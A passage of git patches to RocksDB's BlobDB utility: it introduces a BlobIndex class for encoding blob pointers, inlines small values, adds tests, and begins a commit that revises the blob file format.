ROCKS_LOG_INFO(db_options_.info_log, "Could not parse lsm val in MarkBlobDeleted %s", index_entry.ToString().c_str()); return false; } - bool succ = FindFileAndEvictABlob(handle.filenumber(), key.size(), - handle.offset(), handle.size()); + bool succ = FindFileAndEvictABlob(blob_index.file_number(), key.size(), + blob_index.offset(), blob_index.size()); return succ; } @@ -1756,16 +1657,16 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr<BlobFile>& bfptr, continue; } - BlobHandle handle; - s = handle.DecodeFrom(index_entry); + BlobIndex blob_index; + s = blob_index.DecodeFrom(index_entry); if (!s.ok()) { ROCKS_LOG_ERROR(db_options_.info_log, "Error while decoding index entry: %s", s.ToString().c_str()); break; } - if (handle.filenumber() != bfptr->BlobFileNumber() || - handle.offset() != blob_offset) { + if (blob_index.file_number() != bfptr->BlobFileNumber() || + blob_index.offset() != blob_offset) { // Key has been overwritten. Drop the blob record.
continue; } @@ -1842,12 +1743,9 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, s = new_writer->AddRecord(record.Key(), record.Blob(), &new_key_offset, &new_blob_offset, record.GetTTL()); - BlobHandle new_handle; - new_handle.set_filenumber(newfile->BlobFileNumber()); - new_handle.set_size(record.Blob().size()); - new_handle.set_offset(new_blob_offset); - new_handle.set_compression(bdb_options_.compression); - new_handle.EncodeTo(&new_index_entry); + BlobIndex::EncodeBlob(&new_index_entry, newfile->BlobFileNumber(), + new_blob_offset, record.Blob().size(), + bdb_options_.compression); newfile->blob_count_++; newfile->file_size_ += @@ -2268,6 +2166,11 @@ Status DestroyBlobDB(const std::string& dbname, const Options& options, } #ifndef NDEBUG +Status BlobDBImpl::TEST_GetBlobValue(const Slice& key, const Slice& index_entry, + PinnableSlice* value) { + return GetBlobValue(key, index_entry, value); +} + std::vector> BlobDBImpl::TEST_GetBlobFiles() const { ReadLock l(&mutex_); std::vector> blob_files; diff --git a/utilities/blob_db/blob_db_impl.h b/utilities/blob_db/blob_db_impl.h index 6496c585d34..b18d26e1f4e 100644 --- a/utilities/blob_db/blob_db_impl.h +++ b/utilities/blob_db/blob_db_impl.h @@ -15,6 +15,7 @@ #include #include #include +#include #include #include @@ -215,9 +216,6 @@ class BlobDBImpl : public BlobDB { Status Get(const ReadOptions& read_options, ColumnFamilyHandle* column_family, const Slice& key, PinnableSlice* value) override; - Status GetBlobValue(const Slice& key, const Slice& index_entry, - PinnableSlice* value); - using BlobDB::NewIterator; virtual Iterator* NewIterator(const ReadOptions& read_options) override; @@ -249,7 +247,7 @@ class BlobDBImpl : public BlobDB { using BlobDB::PutUntil; Status PutUntil(const WriteOptions& options, const Slice& key, - const Slice& value_unc, uint64_t expiration) override; + const Slice& value, uint64_t expiration) override; Status LinkToBaseDB(DB* db) override; @@ -263,6 +261,9 @@ class BlobDBImpl : public BlobDB { ~BlobDBImpl(); #ifndef NDEBUG + Status TEST_GetBlobValue(const Slice& key, const Slice& index_entry, + PinnableSlice* value); + std::vector> TEST_GetBlobFiles() const; std::vector> TEST_GetObsoleteFiles() const; @@ -281,6 +282,7 @@ class BlobDBImpl : public BlobDB { private: class GarbageCollectionWriteCallback; + class BlobInserter; Status OpenPhase1(); @@ -288,6 +290,9 @@ class BlobDBImpl : public BlobDB { // Return true if a snapshot is created. 
bool SetSnapshotIfNeeded(ReadOptions* read_options); + Status GetBlobValue(const Slice& key, const Slice& index_entry, + PinnableSlice* value); + Slice GetCompressedSlice(const Slice& raw, std::string* compression_output) const; @@ -314,9 +319,14 @@ class BlobDBImpl : public BlobDB { uint64_t ExtractExpiration(const Slice& key, const Slice& value, Slice* value_slice, std::string* new_value); + Status PutBlobValue(const WriteOptions& options, const Slice& key, + const Slice& value, uint64_t expiration, + SequenceNumber sequence, WriteBatch* batch); + Status AppendBlob(const std::shared_ptr& bfile, const std::string& headerbuf, const Slice& key, - const Slice& value, std::string* index_entry); + const Slice& value, uint64_t expiration, + std::string* index_entry); // find an existing blob log file based on the expiration unix epoch // if such a file does not exist, return nullptr @@ -327,8 +337,6 @@ class BlobDBImpl : public BlobDB { std::shared_ptr FindBlobFileLocked(uint64_t expiration) const; - void UpdateWriteOptions(const WriteOptions& options); - void Shutdown(); // periodic sanity check. Bunch of checks @@ -426,10 +434,6 @@ class BlobDBImpl : public BlobDB { Env* env_; TTLExtractor* ttl_extractor_; - // a boolean to capture whether write_options has been set - std::atomic wo_set_; - WriteOptions write_options_; - // the options that govern the behavior of Blob Storage BlobDBOptions bdb_options_; DBOptions db_options_; diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 592ee609cff..6f16e5b3d4c 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -5,19 +5,24 @@ #ifndef ROCKSDB_LITE -#include "utilities/blob_db/blob_db.h" +#include #include #include #include #include +#include + #include "db/db_test_util.h" #include "port/port.h" +#include "rocksdb/utilities/debug.h" #include "util/cast_util.h" #include "util/random.h" #include "util/string_util.h" #include "util/sync_point.h" #include "util/testharness.h" +#include "utilities/blob_db/blob_db.h" #include "utilities/blob_db/blob_db_impl.h" +#include "utilities/blob_db/blob_index.h" namespace rocksdb { namespace blob_db { @@ -26,6 +31,12 @@ class BlobDBTest : public testing::Test { public: const int kMaxBlobSize = 1 << 14; + struct BlobRecord { + std::string key; + std::string value; + uint64_t expiration = 0; + }; + BlobDBTest() : dbname_(test::TmpDir() + "/blob_db_test"), mock_env_(new MockTimeEnv(Env::Default())), @@ -127,6 +138,32 @@ class BlobDBTest : public testing::Test { delete iter; } + void VerifyBaseDB( + const std::map &expected_versions) { + auto *bdb_impl = static_cast(blob_db_); + DB *db = blob_db_->GetRootDB(); + std::vector versions; + GetAllKeyVersions(db, "", "", &versions); + ASSERT_EQ(expected_versions.size(), versions.size()); + size_t i = 0; + for (auto &key_version : expected_versions) { + const KeyVersion &expected_version = key_version.second; + ASSERT_EQ(expected_version.user_key, versions[i].user_key); + ASSERT_EQ(expected_version.sequence, versions[i].sequence); + ASSERT_EQ(expected_version.type, versions[i].type); + if (versions[i].type == kTypeValue) { + ASSERT_EQ(expected_version.value, versions[i].value); + } else { + ASSERT_EQ(kTypeBlobIndex, versions[i].type); + PinnableSlice value; + ASSERT_OK(bdb_impl->TEST_GetBlobValue(versions[i].user_key, + versions[i].value, &value)); + ASSERT_EQ(expected_version.value, value.ToString()); + } + i++; + } + } + void InsertBlobs() { WriteOptions wo; std::string value; @@ -151,6 +188,7 @@ class 
BlobDBTest : public testing::Test { TEST_F(BlobDBTest, Put) { Random rnd(301); BlobDBOptions bdb_options; + bdb_options.min_blob_size = 0; bdb_options.disable_background_tasks = true; Open(bdb_options); std::map data; @@ -166,6 +204,7 @@ TEST_F(BlobDBTest, PutWithTTL) { options.env = mock_env_.get(); BlobDBOptions bdb_options; bdb_options.ttl_range_secs = 1000; + bdb_options.min_blob_size = 0; bdb_options.blob_file_size = 256 * 1000 * 1000; bdb_options.disable_background_tasks = true; Open(bdb_options, options); @@ -195,6 +234,7 @@ TEST_F(BlobDBTest, PutUntil) { options.env = mock_env_.get(); BlobDBOptions bdb_options; bdb_options.ttl_range_secs = 1000; + bdb_options.min_blob_size = 0; bdb_options.blob_file_size = 256 * 1000 * 1000; bdb_options.disable_background_tasks = true; Open(bdb_options, options); @@ -226,6 +266,7 @@ TEST_F(BlobDBTest, TTLExtrator_NoTTL) { options.env = mock_env_.get(); BlobDBOptions bdb_options; bdb_options.ttl_range_secs = 1000; + bdb_options.min_blob_size = 0; bdb_options.blob_file_size = 256 * 1000 * 1000; bdb_options.num_concurrent_simple_blobs = 1; bdb_options.ttl_extractor = ttl_extractor_; @@ -275,6 +316,7 @@ TEST_F(BlobDBTest, TTLExtractor_ExtractTTL) { options.env = mock_env_.get(); BlobDBOptions bdb_options; bdb_options.ttl_range_secs = 1000; + bdb_options.min_blob_size = 0; bdb_options.blob_file_size = 256 * 1000 * 1000; bdb_options.ttl_extractor = ttl_extractor_; bdb_options.disable_background_tasks = true; @@ -322,6 +364,7 @@ TEST_F(BlobDBTest, TTLExtractor_ExtractExpiration) { options.env = mock_env_.get(); BlobDBOptions bdb_options; bdb_options.ttl_range_secs = 1000; + bdb_options.min_blob_size = 0; bdb_options.blob_file_size = 256 * 1000 * 1000; bdb_options.ttl_extractor = ttl_extractor_; bdb_options.disable_background_tasks = true; @@ -369,6 +412,7 @@ TEST_F(BlobDBTest, TTLExtractor_ChangeValue) { options.env = mock_env_.get(); BlobDBOptions bdb_options; bdb_options.ttl_range_secs = 1000; + bdb_options.min_blob_size = 0; bdb_options.blob_file_size = 256 * 1000 * 1000; bdb_options.ttl_extractor = std::make_shared(); bdb_options.disable_background_tasks = true; @@ -403,6 +447,7 @@ TEST_F(BlobDBTest, TTLExtractor_ChangeValue) { TEST_F(BlobDBTest, StackableDBGet) { Random rnd(301); BlobDBOptions bdb_options; + bdb_options.min_blob_size = 0; bdb_options.disable_background_tasks = true; Open(bdb_options); std::map data; @@ -425,6 +470,7 @@ TEST_F(BlobDBTest, StackableDBGet) { TEST_F(BlobDBTest, WriteBatch) { Random rnd(301); BlobDBOptions bdb_options; + bdb_options.min_blob_size = 0; bdb_options.disable_background_tasks = true; Open(bdb_options); std::map data; @@ -441,6 +487,7 @@ TEST_F(BlobDBTest, WriteBatch) { TEST_F(BlobDBTest, Delete) { Random rnd(301); BlobDBOptions bdb_options; + bdb_options.min_blob_size = 0; bdb_options.disable_background_tasks = true; Open(bdb_options); std::map data; @@ -456,6 +503,7 @@ TEST_F(BlobDBTest, Delete) { TEST_F(BlobDBTest, DeleteBatch) { Random rnd(301); BlobDBOptions bdb_options; + bdb_options.min_blob_size = 0; bdb_options.disable_background_tasks = true; Open(bdb_options); for (size_t i = 0; i < 100; i++) { @@ -473,6 +521,7 @@ TEST_F(BlobDBTest, DeleteBatch) { TEST_F(BlobDBTest, Override) { Random rnd(301); BlobDBOptions bdb_options; + bdb_options.min_blob_size = 0; bdb_options.disable_background_tasks = true; Open(bdb_options); std::map data; @@ -490,6 +539,7 @@ TEST_F(BlobDBTest, Override) { TEST_F(BlobDBTest, Compression) { Random rnd(301); BlobDBOptions bdb_options; + bdb_options.min_blob_size = 0; 
bdb_options.disable_background_tasks = true; bdb_options.compression = CompressionType::kSnappyCompression; Open(bdb_options); @@ -541,6 +591,7 @@ TEST_F(BlobDBTest, MultipleWriters) { TEST_F(BlobDBTest, GCAfterOverwriteKeys) { Random rnd(301); BlobDBOptions bdb_options; + bdb_options.min_blob_size = 0; bdb_options.disable_background_tasks = true; Open(bdb_options); BlobDBImpl *blob_db_impl = @@ -580,6 +631,7 @@ TEST_F(BlobDBTest, GCAfterOverwriteKeys) { TEST_F(BlobDBTest, GCRelocateKeyWhileOverwriting) { Random rnd(301); BlobDBOptions bdb_options; + bdb_options.min_blob_size = 0; bdb_options.disable_background_tasks = true; Open(bdb_options); ASSERT_OK(blob_db_->Put(WriteOptions(), "foo", "v1")); @@ -591,8 +643,8 @@ TEST_F(BlobDBTest, GCRelocateKeyWhileOverwriting) { SyncPoint::GetInstance()->LoadDependency( {{"BlobDBImpl::GCFileAndUpdateLSM:AfterGetFromBaseDB", - "BlobDBImpl::PutUntil:Start"}, - {"BlobDBImpl::PutUntil:Finish", + "BlobDBImpl::PutBlobValue:Start"}, + {"BlobDBImpl::PutBlobValue:Finish", "BlobDBImpl::GCFileAndUpdateLSM:BeforeRelocate"}}); SyncPoint::GetInstance()->EnableProcessing(); @@ -615,6 +667,7 @@ TEST_F(BlobDBTest, GCExpiredKeyWhileOverwriting) { Options options; options.env = mock_env_.get(); BlobDBOptions bdb_options; + bdb_options.min_blob_size = 0; bdb_options.disable_background_tasks = true; Open(bdb_options, options); mock_env_->set_current_time(100); @@ -628,8 +681,8 @@ TEST_F(BlobDBTest, GCExpiredKeyWhileOverwriting) { SyncPoint::GetInstance()->LoadDependency( {{"BlobDBImpl::GCFileAndUpdateLSM:AfterGetFromBaseDB", - "BlobDBImpl::PutUntil:Start"}, - {"BlobDBImpl::PutUntil:Finish", + "BlobDBImpl::PutBlobValue:Start"}, + {"BlobDBImpl::PutBlobValue:Finish", "BlobDBImpl::GCFileAndUpdateLSM:BeforeDelete"}}); SyncPoint::GetInstance()->EnableProcessing(); @@ -656,6 +709,7 @@ TEST_F(BlobDBTest, GCOldestSimpleBlobFileWhenOutOfSpace) { bdb_options.is_fifo = true; bdb_options.blob_dir_size = 100; bdb_options.blob_file_size = 100; + bdb_options.min_blob_size = 0; bdb_options.disable_background_tasks = true; Open(bdb_options); std::string value(100, 'v'); @@ -687,6 +741,7 @@ TEST_F(BlobDBTest, ReadWhileGC) { // run the same test for Get(), MultiGet() and Iterator each. 
for (int i = 0; i < 2; i++) { BlobDBOptions bdb_options; + bdb_options.min_blob_size = 0; bdb_options.disable_background_tasks = true; Open(bdb_options); blob_db_->Put(WriteOptions(), "foo", "bar"); @@ -798,6 +853,7 @@ TEST_F(BlobDBTest, ColumnFamilyNotSupported) { TEST_F(BlobDBTest, GetLiveFilesMetaData) { Random rnd(301); BlobDBOptions bdb_options; + bdb_options.min_blob_size = 0; bdb_options.disable_background_tasks = true; Open(bdb_options); std::map<std::string, std::string> data; @@ -894,6 +950,75 @@ TEST_F(BlobDBTest, OutOfSpace) { ASSERT_TRUE(s.IsNoSpace()); } +TEST_F(BlobDBTest, InlineSmallValues) { + constexpr uint64_t kMaxExpiration = 1000; + Random rnd(301); + BlobDBOptions bdb_options; + bdb_options.ttl_range_secs = kMaxExpiration; + bdb_options.min_blob_size = 100; + bdb_options.blob_file_size = 256 * 1000 * 1000; + bdb_options.disable_background_tasks = true; + Options options; + options.env = mock_env_.get(); + mock_env_->set_current_time(0); + Open(bdb_options, options); + std::map<std::string, std::string> data; + std::map<std::string, KeyVersion> versions; + SequenceNumber first_non_ttl_seq = kMaxSequenceNumber; + SequenceNumber first_ttl_seq = kMaxSequenceNumber; + SequenceNumber last_non_ttl_seq = 0; + SequenceNumber last_ttl_seq = 0; + for (size_t i = 0; i < 1000; i++) { + bool is_small_value = rnd.Next() % 2; + bool has_ttl = rnd.Next() % 2; + uint64_t expiration = rnd.Next() % kMaxExpiration; + int len = is_small_value ? 50 : 200; + std::string key = "key" + ToString(i); + std::string value = test::RandomHumanReadableString(&rnd, len); + std::string blob_index; + data[key] = value; + SequenceNumber sequence = blob_db_->GetLatestSequenceNumber() + 1; + if (!has_ttl) { + ASSERT_OK(blob_db_->Put(WriteOptions(), key, value)); + } else { + ASSERT_OK(blob_db_->PutUntil(WriteOptions(), key, value, expiration)); + } + ASSERT_EQ(blob_db_->GetLatestSequenceNumber(), sequence); + versions[key] = + KeyVersion(key, value, sequence, + (is_small_value && !has_ttl) ?
kTypeValue : kTypeBlobIndex); + if (!is_small_value) { + if (!has_ttl) { + first_non_ttl_seq = std::min(first_non_ttl_seq, sequence); + last_non_ttl_seq = std::max(last_non_ttl_seq, sequence); + } else { + first_ttl_seq = std::min(first_ttl_seq, sequence); + last_ttl_seq = std::max(last_ttl_seq, sequence); + } + } + } + VerifyDB(data); + VerifyBaseDB(versions); + auto *bdb_impl = static_cast<BlobDBImpl *>(blob_db_); + auto blob_files = bdb_impl->TEST_GetBlobFiles(); + ASSERT_EQ(2, blob_files.size()); + std::shared_ptr<BlobFile> non_ttl_file; + std::shared_ptr<BlobFile> ttl_file; + if (blob_files[0]->HasTTL()) { + ttl_file = blob_files[0]; + non_ttl_file = blob_files[1]; + } else { + non_ttl_file = blob_files[0]; + ttl_file = blob_files[1]; + } + ASSERT_FALSE(non_ttl_file->HasTTL()); + ASSERT_EQ(first_non_ttl_seq, non_ttl_file->GetSNRange().first); + ASSERT_EQ(last_non_ttl_seq, non_ttl_file->GetSNRange().second); + ASSERT_TRUE(ttl_file->HasTTL()); + ASSERT_EQ(first_ttl_seq, ttl_file->GetSNRange().first); + ASSERT_EQ(last_ttl_seq, ttl_file->GetSNRange().second); +} + } // namespace blob_db } // namespace rocksdb diff --git a/utilities/blob_db/blob_file.cc b/utilities/blob_db/blob_file.cc index b247a69f33d..9989bacf3d8 100644 --- a/utilities/blob_db/blob_file.cc +++ b/utilities/blob_db/blob_file.cc @@ -15,6 +15,7 @@ #include #include +#include "db/dbformat.h" #include "util/filename.h" #include "util/logging.h" #include "utilities/blob_db/blob_db_impl.h" @@ -36,7 +37,7 @@ BlobFile::BlobFile() gc_once_after_open_(false), ttl_range_(std::make_pair(0, 0)), time_range_(std::make_pair(0, 0)), - sn_range_(std::make_pair(0, 0)), + sn_range_(std::make_pair(kMaxSequenceNumber, 0)), last_access_(-1), last_fsync_(0), header_valid_(false) {} @@ -55,7 +56,7 @@ BlobFile::BlobFile(const BlobDBImpl* p, const std::string& bdir, uint64_t fn) gc_once_after_open_(false), ttl_range_(std::make_pair(0, 0)), time_range_(std::make_pair(0, 0)), - sn_range_(std::make_pair(0, 0)), + sn_range_(std::make_pair(kMaxSequenceNumber, 0)), last_access_(-1), last_fsync_(0), header_valid_(false) {} diff --git a/utilities/blob_db/blob_index.h b/utilities/blob_db/blob_index.h new file mode 100644 index 00000000000..fd91b547a84 --- /dev/null +++ b/utilities/blob_db/blob_index.h @@ -0,0 +1,161 @@ +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). +#pragma once +#ifndef ROCKSDB_LITE + +#include "rocksdb/options.h" +#include "util/coding.h" +#include "util/string_util.h" + +namespace rocksdb { +namespace blob_db { + +// BlobIndex is a pointer to the blob and metadata of the blob. The index is +// stored in base DB as ValueType::kTypeBlobIndex.
+// There are three types of blob index: +// +// kInlinedTTL: +// +------+------------+---------------+ +// | type | expiration | value | +// +------+------------+---------------+ +// | char | varint64 | variable size | +// +------+------------+---------------+ +// +// kBlob: +// +------+-------------+----------+----------+-------------+ +// | type | file number | offset | size | compression | +// +------+-------------+----------+----------+-------------+ +// | char | varint64 | varint64 | varint64 | char | +// +------+-------------+----------+----------+-------------+ +// +// kBlobTTL: +// +------+------------+-------------+----------+----------+-------------+ +// | type | expiration | file number | offset | size | compression | +// +------+------------+-------------+----------+----------+-------------+ +// | char | varint64 | varint64 | varint64 | varint64 | char | +// +------+------------+-------------+----------+----------+-------------+ +// +// There isn't a kInlined (without TTL) type since we can store it as a plain +// value (i.e. ValueType::kTypeValue). +class BlobIndex { + public: + enum class Type : unsigned char { + kInlinedTTL = 0, + kBlob = 1, + kBlobTTL = 2, + kUnknown = 3, + }; + + BlobIndex() : type_(Type::kUnknown) {} + + bool IsInlined() const { return type_ == Type::kInlinedTTL; } + + bool HasTTL() const { + return type_ == Type::kInlinedTTL || type_ == Type::kBlobTTL; + } + + uint64_t expiration() const { + assert(HasTTL()); + return expiration_; + } + + const Slice& value() const { + assert(IsInlined()); + return value_; + } + + uint64_t file_number() const { + assert(!IsInlined()); + return file_number_; + } + + uint64_t offset() const { + assert(!IsInlined()); + return offset_; + } + + uint64_t size() const { + assert(!IsInlined()); + return size_; + } + + Status DecodeFrom(Slice slice) { + static const std::string kErrorMessage = "Error while decoding blob index"; + assert(slice.size() > 0); + type_ = static_cast<Type>(*slice.data()); + if (type_ >= Type::kUnknown) { + return Status::Corruption( + kErrorMessage, + "Unknown blob index type: " + ToString(static_cast<int>(type_))); + } + slice = Slice(slice.data() + 1, slice.size() - 1); + if (HasTTL()) { + if (!GetVarint64(&slice, &expiration_)) { + return Status::Corruption(kErrorMessage, "Corrupted expiration"); + } + } + if (IsInlined()) { + value_ = slice; + } else { + if (GetVarint64(&slice, &file_number_) && GetVarint64(&slice, &offset_) && + GetVarint64(&slice, &size_) && slice.size() == 1) { + compression_ = static_cast<CompressionType>(*slice.data()); + } else { + return Status::Corruption(kErrorMessage, "Corrupted blob offset"); + } + } + return Status::OK(); + } + + static void EncodeInlinedTTL(std::string* dst, uint64_t expiration, + const Slice& value) { + assert(dst != nullptr); + dst->clear(); + dst->reserve(1 + kMaxVarint64Length + value.size()); + dst->push_back(static_cast<char>(Type::kInlinedTTL)); + PutVarint64(dst, expiration); + dst->append(value.data(), value.size()); + } + + static void EncodeBlob(std::string* dst, uint64_t file_number, + uint64_t offset, uint64_t size, + CompressionType compression) { + assert(dst != nullptr); + dst->clear(); + dst->reserve(kMaxVarint64Length * 3 + 2); + dst->push_back(static_cast<char>(Type::kBlob)); + PutVarint64(dst, file_number); + PutVarint64(dst, offset); + PutVarint64(dst, size); + dst->push_back(static_cast<char>(compression)); + } + + static void EncodeBlobTTL(std::string* dst, uint64_t expiration, + uint64_t file_number, uint64_t offset, + uint64_t size, CompressionType compression) { +
assert(dst != nullptr); + dst->clear(); + dst->reserve(kMaxVarint64Length * 4 + 2); + dst->push_back(static_cast<char>(Type::kBlobTTL)); + PutVarint64(dst, expiration); + PutVarint64(dst, file_number); + PutVarint64(dst, offset); + PutVarint64(dst, size); + dst->push_back(static_cast<char>(compression)); + } + + private: + Type type_ = Type::kUnknown; + uint64_t expiration_ = 0; + Slice value_; + uint64_t file_number_ = 0; + uint64_t offset_ = 0; + uint64_t size_ = 0; + CompressionType compression_ = kNoCompression; +}; + +} // namespace blob_db +} // namespace rocksdb +#endif // ROCKSDB_LITE From 9e82540901dd986bbca081d3bb468a6c036f4331 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Fri, 27 Oct 2017 13:14:34 -0700 Subject: [PATCH 179/205] Blob DB: update blob file format Summary: Changing the blob file format, with some code cleanup around the change. The changes to the blob log format are: * Remove the timestamp field from the blob file header, blob file footer and blob records. The field is not being used and is often confused with the expiration field. * The blob file header now comes with a column family id, which always equals the default column family id. It leaves room for future support of column families. * The compression field in the blob file header is now a standalone byte (instead of being compactly encoded with the flags field). * The blob file footer now comes with its own CRC. * Key length is now uint64_t instead of uint32_t. * The blob CRC now checksums both key and value (instead of value only). * Some reordering of the fields. The list of cleanups: * Better inline comments in blob_log_format.h. * Rename ttlrange_t and snrange_t to ExpirationRange and SequenceRange respectively. * Simplify blob_db::Reader. * Move CRC checking logic into blob_log_format.cc. Closes https://github.com/facebook/rocksdb/pull/3081 Differential Revision: D6171304 Pulled By: yiwu-arbug fbshipit-source-id: e4373e0d39264441b7e2fbd0caba93ddd99ea2af --- utilities/blob_db/blob_db_impl.cc | 167 ++++++------ utilities/blob_db/blob_db_test.cc | 8 +- utilities/blob_db/blob_dump_tool.cc | 84 ++---- utilities/blob_db/blob_file.cc | 74 +++--- utilities/blob_db/blob_file.h | 55 ++-- utilities/blob_db/blob_log_format.cc | 367 +++++++++------------------ utilities/blob_db/blob_log_format.h | 300 +++++++--------------- utilities/blob_db/blob_log_reader.cc | 130 ++++------ utilities/blob_db/blob_log_reader.h | 17 +- utilities/blob_db/blob_log_writer.cc | 62 ++--- utilities/blob_db/blob_log_writer.h | 28 +- 11 files changed, 458 insertions(+), 834 deletions(-) diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 1b915420fe5..701066f80ff 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -37,16 +37,6 @@ namespace { int kBlockBasedTableVersionFormat = 2; - -void extendTTL(rocksdb::blob_db::ttlrange_t* ttl_range, uint64_t ttl) { - ttl_range->first = std::min(ttl_range->first, ttl); - ttl_range->second = std::max(ttl_range->second, ttl); -} - -void extendTimestamps(rocksdb::blob_db::tsrange_t* ts_range, uint64_t ts) { - ts_range->first = std::min(ts_range->first, ts); - ts_range->second = std::max(ts_range->second, ts); -} } // end namespace namespace rocksdb { @@ -66,10 +56,12 @@ WalFilter::WalProcessingOption BlobReconcileWalFilter::LogRecordFound( bool blobf_compare_ttl::operator()(const std::shared_ptr<BlobFile>& lhs, const std::shared_ptr<BlobFile>& rhs) const { - if (lhs->ttl_range_.first < rhs->ttl_range_.first) return true; - - if (lhs->ttl_range_.first > rhs->ttl_range_.first) return false; - + if (lhs->expiration_range_.first <
rhs->expiration_range_.first) { + return true; + } + if (lhs->expiration_range_.first > rhs->expiration_range_.first) { + return false; + } return lhs->BlobFileNumber() > rhs->BlobFileNumber(); } @@ -332,6 +324,7 @@ Status BlobDBImpl::OpenAllFiles() { bfpath.c_str(), s1.ToString().c_str(), size_bytes); continue; } + bfptr->SetHasTTL(bfptr->header_.has_ttl); bfptr->header_valid_ = true; std::shared_ptr<RandomAccessFileReader> ra_reader = @@ -355,10 +348,8 @@ Status BlobDBImpl::OpenAllFiles() { "File found incomplete (w/o footer) %s", bfpath.c_str()); // sequentially iterate over the file and read all the records - ttlrange_t ttl_range(std::numeric_limits<uint64_t>::max(), - std::numeric_limits<uint64_t>::min()); - tsrange_t ts_range(std::numeric_limits<uint64_t>::max(), - std::numeric_limits<uint64_t>::min()); + ExpirationRange expiration_range(std::numeric_limits<uint64_t>::max(), + std::numeric_limits<uint64_t>::min()); uint64_t blob_count = 0; BlobLogRecord record; @@ -369,10 +360,10 @@ Status BlobDBImpl::OpenAllFiles() { while (reader->ReadRecord(&record, shallow).ok()) { ++blob_count; if (bfptr->HasTTL()) { - extendTTL(&ttl_range, record.GetTTL()); - } - if (bfptr->HasTimestamp()) { - extendTimestamps(&ts_range, record.GetTimeVal()); + expiration_range.first = + std::min(expiration_range.first, record.expiration); + expiration_range.second = + std::max(expiration_range.second, record.expiration); } record_start = reader->GetNextByte(); } @@ -391,24 +382,21 @@ } bfptr->SetBlobCount(blob_count); - bfptr->SetSNRange({0, 0}); - - if (bfptr->HasTimestamp()) bfptr->set_time_range(ts_range); + bfptr->SetSequenceRange({0, 0}); ROCKS_LOG_INFO(db_options_.info_log, "Blob File: %s blob_count: %" PRIu64 - " size_bytes: %" PRIu64 " ts: %d ttl: %d", - bfpath.c_str(), blob_count, size_bytes, - bfptr->HasTimestamp(), bfptr->HasTTL()); + " size_bytes: %" PRIu64 " has_ttl: %d", + bfpath.c_str(), blob_count, size_bytes, bfptr->HasTTL()); if (bfptr->HasTTL()) { - ttl_range.second = - std::max(ttl_range.second, - ttl_range.first + (uint32_t)bdb_options_.ttl_range_secs); - bfptr->set_ttl_range(ttl_range); + expiration_range.second = std::max( + expiration_range.second, + expiration_range.first + (uint32_t)bdb_options_.ttl_range_secs); + bfptr->set_expiration_range(expiration_range); uint64_t now = EpochNow(); - if (ttl_range.second < now) { + if (expiration_range.second < now) { Status fstatus = CreateWriterLocked(bfptr); if (fstatus.ok()) fstatus = bfptr->WriteFooterAndCloseLocked(); if (!fstatus.ok()) { @@ -418,10 +406,11 @@ bfpath.c_str(), fstatus.ToString().c_str()); continue; } else { - ROCKS_LOG_ERROR(db_options_.info_log, - "Blob File Closed: %s now: %d ttl_range: (%d, %d)", - bfpath.c_str(), now, ttl_range.first, - ttl_range.second); + ROCKS_LOG_ERROR( + db_options_.info_log, + "Blob File Closed: %s now: %d expiration_range: (%d, %d)", + bfpath.c_str(), now, expiration_range.first, + expiration_range.second); } } else { open_blob_files_.insert(bfptr); @@ -483,9 +472,9 @@ Status BlobDBImpl::CreateWriterLocked(const std::shared_ptr<BlobFile>& bfile) { } Writer::ElemType et = Writer::kEtNone; - if (bfile->file_size_ == BlobLogHeader::kHeaderSize) { + if (bfile->file_size_ == BlobLogHeader::kSize) { et = Writer::kEtFileHdr; - } else if (bfile->file_size_ > BlobLogHeader::kHeaderSize) { + } else if (bfile->file_size_ > BlobLogHeader::kSize) { et = Writer::kEtRecord; } else if (bfile->file_size_) { ROCKS_LOG_WARN(db_options_.info_log, @@ -507,14 +496,14 @@ std::shared_ptr<BlobFile> BlobDBImpl::FindBlobFileLocked( if
(open_blob_files_.empty()) return nullptr; std::shared_ptr<BlobFile> tmp = std::make_shared<BlobFile>(); - tmp->ttl_range_ = std::make_pair(expiration, 0); + tmp->expiration_range_ = std::make_pair(expiration, 0); auto citr = open_blob_files_.equal_range(tmp); if (citr.first == open_blob_files_.end()) { assert(citr.second == open_blob_files_.end()); std::shared_ptr<BlobFile> check = *(open_blob_files_.rbegin()); - return (check->ttl_range_.second < expiration) ? nullptr : check; + return (check->expiration_range_.second < expiration) ? nullptr : check; } if (citr.first != citr.second) return *(citr.first); @@ -522,8 +511,8 @@ std::shared_ptr<BlobFile> BlobDBImpl::FindBlobFileLocked( auto finditr = citr.second; if (finditr != open_blob_files_.begin()) --finditr; - bool b2 = (*finditr)->ttl_range_.second < expiration; - bool b1 = (*finditr)->ttl_range_.first > expiration; + bool b2 = (*finditr)->expiration_range_.second < expiration; + bool b1 = (*finditr)->expiration_range_.first > expiration; return (b1 || b2) ? nullptr : (*finditr); } @@ -560,9 +549,11 @@ std::shared_ptr<BlobFile> BlobDBImpl::SelectBlobFile() { return nullptr; } - bfile->file_size_ = BlobLogHeader::kHeaderSize; - bfile->header_.compression_ = bdb_options_.compression; + bfile->file_size_ = BlobLogHeader::kSize; + bfile->header_.compression = bdb_options_.compression; + bfile->header_.has_ttl = false; bfile->header_valid_ = true; + bfile->SetHasTTL(false); // CHECK again WriteLock wl(&mutex_); @@ -603,7 +594,7 @@ std::shared_ptr<BlobFile> BlobDBImpl::SelectBlobFileTTL(uint64_t expiration) { uint64_t exp_low = (expiration / bdb_options_.ttl_range_secs) * bdb_options_.ttl_range_secs; uint64_t exp_high = exp_low + bdb_options_.ttl_range_secs; - ttlrange_t ttl_guess = std::make_pair(exp_low, exp_high); + ExpirationRange expiration_range = std::make_pair(exp_low, exp_high); bfile = NewBlobFile("SelectBlobFileTTL"); assert(bfile); @@ -621,14 +612,16 @@ std::shared_ptr<BlobFile> BlobDBImpl::SelectBlobFileTTL(uint64_t expiration) { return nullptr; } - bfile->header_.set_ttl_guess(ttl_guess); - 